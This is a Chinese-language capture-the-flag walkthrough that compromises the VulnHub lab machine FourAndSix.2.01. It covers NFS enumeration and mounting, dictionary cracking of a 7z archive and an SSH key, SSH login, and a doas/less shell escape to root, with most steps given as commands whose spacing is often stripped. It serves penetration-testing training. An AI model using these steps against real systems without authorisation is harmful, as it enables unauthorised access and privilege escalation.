本文记录了FourAndSix.2.01靶机的完整详细渗透测试过程包括信息收集、漏洞发现、获取shell以及提权至root的方法。靶机下载链接https://download.vulnhub.com/fourandsix/FourAndSix2.ova靶机名称:FourAndSix.2.01测试时间2026/3/25一.概述查询攻击机kaliIP:ifconfig得到攻击机(kali)IP192.168.253.166查询靶机IPnmap-sn192.168.253.00/24或netdiscover-r192.168.253.00/24得到靶机IP192.168.253.176二. 信息收集扫描常见端口nmap-A--top-ports100192.168.253.176得到开放端口有22ssh登录111NFS 服务远程共享文件2049RPC 服务远程调用程序查看nfs共享文件showmount-e192.168.253.176有一个/home/user/storage目录创建文件夹mkdir/mnt/nfs把共享目录上传到/mnt/nfsmount-tnfs192.168.253.176:/home/user/storage /mnt/nfs查看里面文件cd/mnt/nfsls-la有一个压缩文件我们解压它7z x backup.7z但是需要密码我们尝试破解它先提取哈希值7z2john backup.7z7z.hash进行破解john 7z.hash得到密码为chocolate既然知道密码了我们再次进行解压7z x backup.7z解压成功查看文件ls-la多出了一些图片和公钥私钥我们尝试对私钥进行破解提取私钥哈希值/usr/share/john/ssh2john.py id_rsaid_rsa.hash爆破密码john--wordlist/usr/share/wordlists/rockyou.txt id_rsa.hash得到密码为12345678进行ssh登录chmod600id_rsassh-iid_rsa user192.168.253.176成功登录三. 漏洞发现与利用漏洞类型敏感信息泄露漏洞利用过程根据NFS共享目录得到压缩文件夹提取压缩文件夹哈希值并破解密码破解压缩文件夹里的私钥用于ssh登录四. 权限提升用id或whoami查看自己身份查看内核版本uname-a检测SUID文件find/-perm-4000-typef2/dev/null发现/usr/bin/doassudo极简版访问它的配置文件cat/etc/doas.conf第一行代表用户 user 可以无密码地以 root 身份运行 less /var/log/authlog第二行代表用户 root 可以无密码地以 root 身份运行任何命令所以我们可以利用第一行的漏洞用less打开日志文件doas /usr/bin/less /var/log/authlog进入less后按v开始编辑模式然后输入:!id即可执行命令id我们用户确实是root那我们执行:!/bin/sh意思是打开sh,因为我们现在用户是root所以打开sh就是以root权限打开sh成功得到root权限flag在root目录里面Nice you hacked all the passwords!Not all tools worked well. But with somecommandmagic...:cat/usr/share/wordlists/rockyou.txt|whilereadline;do7z e backup.7z -p$line-oout;ifgrep-iRlSSH;thenecho$line;break;fi;donecat/usr/share/wordlists/rockyou.txt|whilereadline;doifssh-keygen-p-P$line-Npassword-fid_rsa;thenecho$line;break;fi;doneHere is the flag: acd043bc3103ed3dd02eee99d5b0ff42五.总结与反思本次测试主要难点NFS 信息收集通过 showmount -e 发现共享目录 /home/user/storage并成功挂载获得压缩包文件。密码破解backup.7z 有密码保护需要提取哈希并用 john 配合字典破解还有破解私钥最终得到密码权限提升登录后通过 SUID 程序 doas 的配置漏洞利用 less 编辑器以 root 权限执行命令最终获得 root shell。学到的技巧NFS 共享利用掌握了使用 showmount 列举共享、mount 挂载网络文件系统的方法并能从挂载点中提取敏感文件。巩固了使用 7z2john 提取 7z 哈希、ssh2john 提取 SSH 私钥哈希以及 john 进行字典攻击的完整流程。doas 配置滥用学会了通过 cat /etc/doas.conf 检查权限配置并利用 less 编辑器绕过限制实现提权。